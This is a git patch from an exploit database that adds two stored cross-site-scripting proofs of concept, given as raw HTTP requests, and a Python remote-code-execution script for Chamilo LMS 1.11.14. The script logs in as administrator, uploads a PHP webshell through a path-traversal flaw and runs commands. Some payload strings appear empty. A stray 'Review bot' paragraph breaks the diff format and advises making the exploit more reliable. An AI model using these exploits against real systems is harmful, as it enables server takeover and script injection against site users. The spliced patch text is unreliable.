From 8845e341e475d5f9035a89d497c810db563e210b Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sat, 15 May 2021 05:01:51 +0000
Subject: [PATCH] DB: 2021-05-15 3 changes to exploits/shellcodes Student Management System 1.0 - 'message' Persistent Cross-Site Scripting (Authenticated) Podcast Generator 3.1 - 'Long Description' Persistent Cross-Site Scripting (XSS) Chamilo LMS 1.11.14 - Remote Code Execution (Authenticated)
---
 exploits/php/webapps/49865.txt | 29 +++++++++
 exploits/php/webapps/49866.txt | 112 +++++++++++++++++++++++++++++++++
 exploits/php/webapps/49867.py | 71 +++++++++++++++++++++
 files_exploits.csv | 3 +
 4 files changed, 215 insertions(+)
 create mode 100644 exploits/php/webapps/49865.txt
 create mode 100644 exploits/php/webapps/49866.txt
 create mode 100755 exploits/php/webapps/49867.py
diff --git a/exploits/php/webapps/49865.txt b/exploits/php/webapps/49865.txt
new file mode 100644
index 000000000..34b35bba3
--- /dev/null
+++ b/exploits/php/webapps/49865.txt
@@ -0,0 +1,29 @@
+# Exploit Title: Student Management System 1.0 - 'message' Persistent Cross-Site Scripting (Authenticated)
+# Date: 2021-05-13
+# Exploit Author: mohsen khashei (kh4sh3i) or kh4sh3i@gmail.com
+# Vendor Homepage: https://github.com/amirhamza05/Student-Management-System
+# Software Link: https://github.com/amirhamza05/Student-Management-System/archive/refs/heads/master.zip
+# Version: 1.0
+# Tested on: ubuntu 20.04.2
+
+# --- Description --- #
+
+# The web application allows for an Attacker to inject persistent Cross-Site-Scripting payload in Live Chat.
+
+
+# --- Proof of concept --- #
+
+1- Login to Student Management System
+2- Click on Live Chat button
+3- Inject this payload and send :
+5- Xss popup will be triggered.
+
+
+# --- Malicious Request --- #
+
+POST /nav_bar_action.php HTTP/1.1
+Host: (HOST)
+Cookie: (PHPSESSID)
+Content-Length: 96
+
+send_message_chat%5Bmessage%5D=
\ No newline at end of file
diff --git a/exploits/php/webapps/49866.txt b/exploits/php/webapps/49866.txt
new file mode 100644
index 000000000..ba7804352
--- /dev/null
+++ b/exploits/php/webapps/49866.txt
@@ -0,0 +1,112 @@
+# Exploit Title: Podcast Generator 3.1 - 'Long Description' Persistent Cross-Site Scripting (XSS)
+# Date: 13/05/2021
+# Exploit Author: Ayşenur KARAASLAN
+# Vendor Homepage: https://podcastgenerator.net/demoV2/
+# Software Link: https://podcastgenerator.net/download and https://github.com/PodcastGenerator/PodcastGenerator/archive/v3.1.1.zip
+# Version: < 3.1.1
+# CVE: N/A
+
+Podcast Generator is an open source Content Management System written in PHP and specifically designed for podcast publishing.
+
+#Description
+The following is PoC to use the XSS bug with unauthorized user.
+
+1. Login to your admin account.
+2. "Upload New Episode" or "Edit" field has got "Long Description". Long Description field is not filtered. It is possible to place JavaScript code.
+3. Click the Home button
+4. Click "More" button of created or edited episode.
+
+# Vulnerable Parameter Type: POST
+# Vulnerable Parameter: long_description
+# Attack Pattern:
+
+#PoC
+HTTP Request:
+
+POST /demoV2/pg/?p=admin&do=edit&c=ok HTTP/1.1
+Host: podcastgenerator.net
+Cookie: PHPSESSID=2k93317b1dcraih0ti3p8rehc4;
+_ga=GA1.2.2015734934.1620928725; _gid=GA1.2.1455863373.1620928725
+Content-Length: 1590
+Cache-Control: max-age=0
+Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
+Sec-Ch-Ua-Mobile: ?0
+Upgrade-Insecure-Requests: 1
+Origin: https://podcastgenerator.net
+Content-Type: multipart/form-data;
+boundary=----WebKitFormBoundaryMJiUJ3BGzyG5zwxd
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: frame
+Referer:
+https://podcastgenerator.net/demoV2/pg/?p=admin&do=edit&=episode&name=aysenurxss-poc.jpg
+Accept-Encoding: gzip, deflate
+Accept-Language: 
tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+Connection: close
+
+------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
+Content-Disposition: form-data; name="userfile"
+
+aysenurxss-poc.jpg
+------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
+Content-Disposition: form-data; name="title"
+
+Aysenur-PoC
+------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
+Content-Disposition: form-data; name="description"
+
+poc
+------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
+Content-Disposition: form-data; name="countdown"
+
+255
+------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
+Content-Disposition: form-data; name="category[]"
+
+about
+------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
+Content-Disposition: form-data; name="Day"
+
+13
+------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
+Content-Disposition: form-data; name="Month"
+
+5
+------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
+Content-Disposition: form-data; name="Year"
+
+2021
+------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
+Content-Disposition: form-data; name="Hour"
+
+14
+------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
+Content-Disposition: form-data; name="Minute"
+
+29
+------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
+Content-Disposition: form-data; name="long_description"
+
+
+------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
+Content-Disposition: form-data; name="keywords"
+
+poc
+------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
+Content-Disposition: form-data; name="explicit"
+
+no
+------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
+Content-Disposition: form-data; name="auth_name"
+
+aysenur
+------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
+Content-Disposition: form-data; name="auth_email"
+
+aysenur@emailaddress.com
+------WebKitFormBoundaryMJiUJ3BGzyG5zwxd--
\ No newline at end of file
diff --git a/exploits/php/webapps/49867.py b/exploits/php/webapps/49867.py
new file mode 100755
index 000000000..e0a6d3aaa
--- /dev/null
+++ b/exploits/php/webapps/49867.py
@@ -0,0 +1,71 @@
+# Exploit Title: Chamilo LMS 1.11.14 - Remote Code Execution (Authenticated)
+# Date: 13/05/2021
+# Exploit Author: M. Cory Billington (@_th3y)
+# Vendor Homepage: https://chamilo.org
+# Software Link: https://github.com/chamilo/chamilo-lms
+# Version: 1.11.14
+# Tested on: Ubuntu 20.04.2 LTS
+# CVE: CVE-2021-31933
+# Writeup: https://theyhack.me/CVE-2021-31933-Chamilo-File-Upload-RCE/
+
+from requests import Session
+from random import choice
+from string import ascii_lowercase
+
+import requests
+
+# This is all configuration stuff,
+url = "http://127.0.0.1/chamilo-lms/" # URL to remote host web root
+user_name = "admin" # User must be an administrator
+password = "admin"
+command = "id;whoami"
+
+# Where you want to upload your webshell. Must be writable by web server user.
+# This spot isn't protectec by .htaccess
+webshell_path = 'web/'
+webshell_name = f"shell-{''.join(choice(ascii_lowercase) for _ in range(6))}.phar" # Just a random name for webshell file
+content = f""
+
+def main():
+ # Run a context manager with a session object to hold login session after login
+ with Session() as s:
+ login_url = f"{url}index.php"
+ login_data = {
+ "login": user_name,
+ "password": password
+ }
+ r = s.post(login_url, data=login_data) # login request
+
+ # Check to see if login as admin user was successful.
+ if "admin" not in r.url:
+ print(f"[-] Login as {user_name} failed. Need to be admin")
+ return
+ print(f"[+] Logged in as {user_name}")
+ print(f"[+] Cookie: {s.cookies}")
+ file_upload_url = f"{url}main/upload/upload.php"
+ # The 'curdirpath' is not santitized, so I traverse to the '/var/www/html/chamilo-lms/web/build' directory. 
I can upload to /tmp/ as well
+ php_webshell_file = {
+ "curdirpath": (None, f"/../../../../../../../../../var/www/html/chamilo-lms/{webshell_path}"),
+ "user_upload": (webshell_name, content)
+ }
+
+ ## Good command if you want to see what the request looks like without sending
+ # print(requests.Request('POST', file_upload_url, files=php_webshell_file).prepare().body.decode('ascii'))
+
+ # Two requests required to actually upload the file
+ for i in range(2):
+ s.post(file_upload_url, files=php_webshell_file)
+
+ exploit_request_url = f"{url}{webshell_path}{webshell_name}"
+ print("[+] Upload complete!")
+ print(f"[+] Webshell: {exploit_request_url}")
+
+ # This is a GET request to the new webshell to trigger code execution
+ command_output = s.get(exploit_request_url)
+ print("[+] Command output:\n")
+ print(command_output.text)
+
+
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 2384ca6cd..5ec3b7bd2 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
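Review bot: Both `s.post(file_upload_url, files=php_webshell_file)` calls inside `for i in range(2):` discard their responses, so `print("[+] Upload complete!")` runs whether or not the server accepted anything, and the final `s.get(exploit_request_url)` result is printed without a status check either; bind each response and call `r.raise_for_status()` (or test `r.ok`) before announcing success. The login check `if "admin" not in r.url:` is brittle for the same reason — it infers success from the redirect target rather than from the response body or status. `import requests` is referenced only in the commented-out `print(requests.Request(...))` line and duplicates `from requests import Session`, so it should be dropped along with the unused loop index `i` (use `_`). The module-level `url`, `user_name`, `password` and `command` constants would be clearer as `argparse` parameters or environment variables, with the "User must be an administrator" requirement stated in the module docstring instead of a trailing comment.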
@@ -44030,3 +44030,6 @@ id,file,description,date,author,type,platform,port
 49860,exploits/php/webapps/49860.txt,"Dental Clinic Appointment Reservation System 1.0 - Authentication Bypass (SQLi)",2021-05-13,"Mesut Cetin",webapps,php,
 49861,exploits/php/webapps/49861.txt,"Dental Clinic Appointment Reservation System 1.0 - 'date' UNION based SQL Injection (Authenticated)",2021-05-13,"Mesut Cetin",webapps,php,
 49862,exploits/linux/webapps/49862.py,"ZeroShell 3.9.0 - Remote Command Execution",2021-05-13,"Fellipe Oliveira",webapps,linux,
+49865,exploits/php/webapps/49865.txt,"Student Management System 1.0 - 'message' Persistent Cross-Site Scripting (Authenticated)",2021-05-14,"mohsen khashei",webapps,php,
+49866,exploits/php/webapps/49866.txt,"Podcast Generator 3.1 - 'Long Description' Persistent Cross-Site Scripting (XSS)",2021-05-14,"Ayşenur KARAASLAN",webapps,php,
+49867,exploits/php/webapps/49867.py,"Chamilo LMS 1.11.14 - Remote Code Execution (Authenticated)",2021-05-14,"M. Cory Billington",webapps,php,